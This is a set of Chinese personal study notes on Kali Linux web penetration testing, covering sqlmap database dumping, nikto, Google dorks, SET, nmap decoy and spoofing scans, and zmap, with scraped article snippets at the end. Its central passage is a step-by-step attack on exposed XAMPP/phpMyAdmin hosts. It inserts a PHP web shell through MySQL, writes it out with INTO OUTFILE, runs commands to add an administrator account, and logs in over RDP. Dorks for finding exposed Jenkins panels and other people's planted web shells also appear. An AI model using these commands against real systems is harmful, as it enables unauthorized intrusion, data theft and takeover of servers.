kali linux web渗透测试学习笔记

 
 

kali linux web渗透测试学习笔记

metasploit使用方法:

启动:

第一步:启用Postgresql服务。service postgresql start

第二步:启用metasploit服务。service matasploit start

第三步:启动框架。msfconsole

一个ASP站点的sql注入

测试数字型注入点

1.网址:asp?ID+13,后面加',看看是什么数据库,然后输入1=1,1=2,得到数据库是microsoft acess

2.转用sqlmap工具测试,命令:sqlmap -u 目标网址 --dbs --current-user

sqlmap拆解数据库和表名

拆解表名

命令:sqlmap -u 目标网址 --tables,线程数最大为10,基于字典拆解表名,得到的表可能不全面。

dump表数据

1.拆解一个表的列名

命令:sqlmap -u 目标网址 -T 表名 --columns

2.得到感兴趣的字段的值

命令:sqlmap -u 目标网址 -T 表名 -C 列名1,列名2,列名3 --dump

登录后台

找到登录按钮

教训:数据库密码一定要加密!

一个PHP站点的sql注入

测试数字型注入点

index.php?id=1,同上,得到数据库为mysql

sqlmap拆解数据库和表名

1.扫描数据库

命令:sqlmap -u 目标网址 --dbs --current-user

2.扫描某个数据库的表

命令:sqlmap -u 目标网址 --dbms mysql-D 数据库名 --tables,参数可自行选择

dump表数据

查看表字段

同上

利用nikto帮助寻找隐藏目录,利用网页源代码中的隐藏信息寻找管理后台

命令:nikto -host 目标网站

将找到的路径放进去查看,一个个试试,附加上查看源代码,找manage

提升管理员权限:

用fiddler看看页面情况,查看系统返回的代码,编辑建立HTML文件,运行,设置fiddler(auto),将返回结果保存在本地。

返回页面

Google hack实战

能做到的事:

1.寻找持续构建工具Jenkins管理面板,有可能获取某些项目的源代码或者敏感信息;

2.综合利用各种信息搞定xampp,一个集成架构,包括比如phpmyadmin之类的东西

3.后门查找

4.关于Google hack database

Google hack语法查询:http://www.xuanhun521.com

寻找持续构建工具Jenkins(一个源代码构建工具,可以查看开发人员,项目,源代码)管理面板

1.inurl:8080 intitle:"Dashboard [Jenkins]"     造成源代码泄露

综合利用各种信息搞定xampp,一个集成架构,包括比如phpmyadmin之类的东西

寻找安装xampp的主机:inurl:"xampp/index"  intext:"XAMPP for Windows"

1)寻找phpmyadmin不用验证或者弱口令管理页面,通过mysql的root权限插入一句话木马提取,获取服务器管理权限

1>>有用信息:phpinfo。可以看到网站目录;phpmyadmin管理入口,看权限菜单,添加用户

2>>连接网站的mysql服务器

          命令:mysql -u 你添加的用户名 -h 你找的网站ip -p 你添加的账户密码

         use mysql

3>>创建表

4>>向表中插入数据,其实插入的是一段命令,调用cmd并且在系统环境下执行

命令:INSERT INTO aa (packet) VALUES('<pre><body bgcolor=silver><? @sysytem($_GET["cmd"]); ?></body></pre>')

5>>select * into outfile ' / / / /aa.php ' from aa,这里的路径应该是可执行的。可以将路径粘贴下来,写如phpinfo的路径

6>>访问这个网站地址。........../aa.php

7>>好了,接下来我们前面插入的那句话就要起作用啦。试着访问........../aa.php?cmd=dir,这里可以写好多命令哦

8>>接下来创建账号cmd=net user 小明 123456 /add  ,创建成功!

9>>将我们创建的账户添加到管理员用户组cmd=net localgroup administrators 小明 /add

10>>启动mstsc,远程连接,用户名和密码就是我们刚刚创建的小明和123456

后门查找

Google搜索目标:intitle:"=[1n73ct10n privat shell]="

intitle:"WSO 2.4"[Sec.Info],[Files],[Console],[Sql],[Php],[Safe mode],[String tools],[Bruteforce],[Network],[Self remove]

关于google hack database:

http://www.exploit-db.com/google-dorks/

SET,社会工程学工具集

SET是开源的社会工程学利用套件,通常结合metasploit来使用,项目地址:http://github.com/trustedsec/social-engineer-toolkit

进入kali,用命令setoolkit启动,选1。攻击方法:

鱼叉式钓鱼攻击(通过邮件,发送有问题邮件),网站攻击,介质感染攻击,群发邮件攻击,基于Arduino的攻击,短信欺骗攻击,无线接入点攻击,二维码攻击,powershell攻击

 

nmap

主机扫描:

namp -sL 103.10.87.1-255 列表扫描

nmap -PE  IP

nmap -Pn IP(不适用ping扫描,更适用于Internet)

nmap -sP IP(快速ping扫描),用来快速发现存活主机

-sn参数,只探测存活主机,不管端口啥的

尝试多种扫描方式,来扫描主机

端口扫描:

nmap -sS IP

nmap -sT IP ;TCP端口扫描

nmap -sU IP; UDP端口扫描

nmap -sU -p 80,445 IP ;指定端口

nmap -sT -v IP启用细节模式

操作系统探测:

参数:

-O(启用操作系统检测)

-osscan-limit(针对指定的目标进行操作系统检测)

--osscan-guess;--fuzzy(推测OS检测结果,在nmap不能给出确定结果的情况下使用)

示例:

nmap -sT -O IP

nmap -sT -p 3390 -O --osscan-limit IP  (只有打开3390端口,才进行操作系统版本探测)

namp -sA -O IP

服务程序探测:

nmap -sA -sV IP  扫描方式ACK ;扫描某台主机的服务程序

nmap -sV -p 22,53,110           ;扫描某个服务的服务程序

nmap高级用法:

nmap --iflist(查看本地路由与接口) 可以看到网关地址,网络接口啥的

nmap -e 08:00:27:47:63:E6 IP(指定mac和IP地址)(本地有多个网络接口时

nmap -T4 -F -n -Pn -D192.168.1.100,192.168.1.101,192.168.1.102,ME 192.168.1.103(地址诱骗)前面地址都是虚假的,后面的才是真的

nmap -sV --spoof -mac 08:00:27:47:63:E6 IP(虚假mac地址)

nmap -sV --source-port 900 IP --source-port(指定源端口)

nmap -p1-25,80,512,2001,4001,6001,9001 10.20.0.1/16(扫描思科路由器)

nmap -sU -p69 -nvv 192.168.1.253(扫描路由器的tftp协议)

nmap -O -F -n 103.10.87.148(-F快速扫描)  扫描常见的端口

nmap --script=brute 103.10.87.148(暴力破解)

参考资料:http://drops.wooyun.org/tips/2188

zmap

专注于网络端口的扫描

官方站点:http://zmap.io/

源码:https://github.com/zmap/zmap

zmap安装及使用:链接:http://pan.baidu.com/s/1bp7ddhl 密码:ypbr   (pan 百度云盘)

默认情况使用SYN扫描方式

时间: 2024-08-03 09:24:54

kali linux web渗透测试学习笔记的相关文章

Web安全测试学习笔记——“淘金”式攻击

做软件测试的目的在于找到缺陷和证明缺陷,在这个过程中进行全面覆盖性或反复测试,以图无限地趋近100%,结果可能很好,但工作效率非常低.在WEB安全测试上,如何避免大海捞沙,需要有的放矢,把有价值的信息淘出来. 安全测试的出发点和功能测试不太相同,安全测试的手段就是攻击,攻击,还是攻击.寻找有价值的信息,就是测试的第一招."淘金"就是其中的一种方式,一般来说由以下信息需要关注. ◆ HTML中的代码注释 ◆ HTML中的敏感代码 ◆ 服务器或应用程序的错误信息和HTTP响应 代码注释是一

做一名安静的Web渗透测试人员必备的8种素质和技能

无疑,Web安全测试工程师或Web渗透测试工程师的任务就是审计公司的Web应用程序.Web服务.Web服务器的安全性.那么,公司如何才能请到优秀的Web应用安全专家而不是纸上谈兵的"赵括"?下面的这八项素质或技能可以为公司选聘Web渗透测试人员提供参考: 1. Web渗透测试人员拥有一定的开发背景(知道如何编码) 公司不可能聘用一位连编写代码都不懂人成为渗透测试人员.公司的Web渗透测试者应首先是开发者,在此基础上才考虑对Web漏洞扫描器的掌握技能,其好处有五个方面: · 了解所开发W

做一名安静的Web渗透测试人员 要必备的8种素质和技能

无疑,Web安全测试工程师或Web渗透测试工程师的任务就是审计公司的Web应用程序.Web服务.Web服务器的安全性.那么,公司如何才能请到优秀的Web应用安全专家而不是纸上谈兵的"赵括"?下面的这八项素质或技能可以为公司选聘Web渗透测试人员提供参考: 1. Web渗透测试人员拥有一定的开发背景(知道如何编码) 公司不可能聘用一位连编写代码都不懂人成为渗透测试人员.公司的Web渗透测试者应首先是开发者,在此基础上才考虑对Web漏洞扫描器的掌握技能,其好处有五个方面: · 了解所开发W

黑客组织匿名者Anonymous发布操作系统,提供各种Web渗透测试工具

3月15日消息,Windows 8消费者预览版发布后不久,全球知名黑客组织匿名者(Anonymous)就发布了命名为Anonymous-OS的操作系统,并在其官网上给出了公开下载地址. Anonymous发布名为Anonymous-OS的操作系统 据悉,Anonymous-OS操作系统基于Ubuntu11.10,提供了各种Web渗透测试工具,包括: 1.ParolaPass Password Generator(ParolaPass密码发生器) 2.Find Host IP(查找主机IP) 3.

如何进行Web渗透测试

Web渗透测试可以从以下几个方面考虑: 1.SQL Injection(SQL注入) (1)如何进行SQL注入测试? 首先找到带有参数传递的URL页面,如 搜索页面,登录页面,提交评论页面等等. 注1:对 于未明显标识在URL中传递参数的,可以通过查看HTML源代码中的"FORM"标签来辨别是否还有参数传递.在 和的标签中间的每一个参数传递都有可能被利用. Gamefinder 注 2:当你找不到有输入行为的页面时,可以尝试找一些带有某些参数的特殊的URL,如HTTP://DOMAIN

BackTrack v5发布 基于linux的渗透测试兵工厂

BackTrack是一个基于linux的渗透测试兵工厂(工具库),它的目的是帮助专业的安全人员在一个纯粹致力于hacking的系统环境中执 行安全评估任务.BackTrack支持多种存储设备,每个安装包.内核配置.脚本和补丁完全为渗透测试者量身定制. BackTrack v5发行说明: The BackTrack Dev team has worked furiously in the past months on BackTrack 5, code http://www.aliyun.com/

.net+oracle+crystalReports开发web应用程序学习笔记(二)

oracle|web|笔记|程序 上次提到基本的配置注意问题,现在开始实际开发oracle中的问题 一 oracle 数据库的连接 但你装了oracle的客户端,在配置时就已经指定了数据库服务器,所以连接时主要由三个元素就可以连接上数据库,数据库的名称(即SID),用户名,密码 SqlConnection con=new SqlConnection("Provider=MSDAORA.1;User ID=UserID;Data Source=xf;Password=password")

从几个方向进行Web渗透测试

1.SQL Injection(SQL注入)   (1)如何进行SQL注入测试? 首先找到带有参数传递的URL页面,如 搜索页面,登录页面,提交评论页面等等. 对于未明显标识在URL中传递参数的,可以通过查看HTML源代码中的"FORM"标签来辨别是否还有参数传递,在<FORM> 和</FORM>的标签中间的每一个参数传递都有可能被利用. 1 2 3 4 5 6 7 8 9 10 11 12 13 <form id="form_search&qu

Linux Shell脚本编程学习笔记和实战

http://www.1987.name/141.html shell基础 终端打印.算术运算.常用变量 Linux下搜索指定目录下特定字符串并高亮显示匹配关键词 从键盘或文件中获取标准输入 [read命令] 文件的描述符和重定向 数组.关联数组和别名使用 函数的定义.执行.传参和递归函数 条件测试操作与流程控制语句 获取时间日期格式和延时 [date.sleep命令] 内部字段分隔符IFS和脚本的调试DEBUG 显示.读取或拼接文件内容 [cat命令] 文件查找与打印文件列表 [find命令]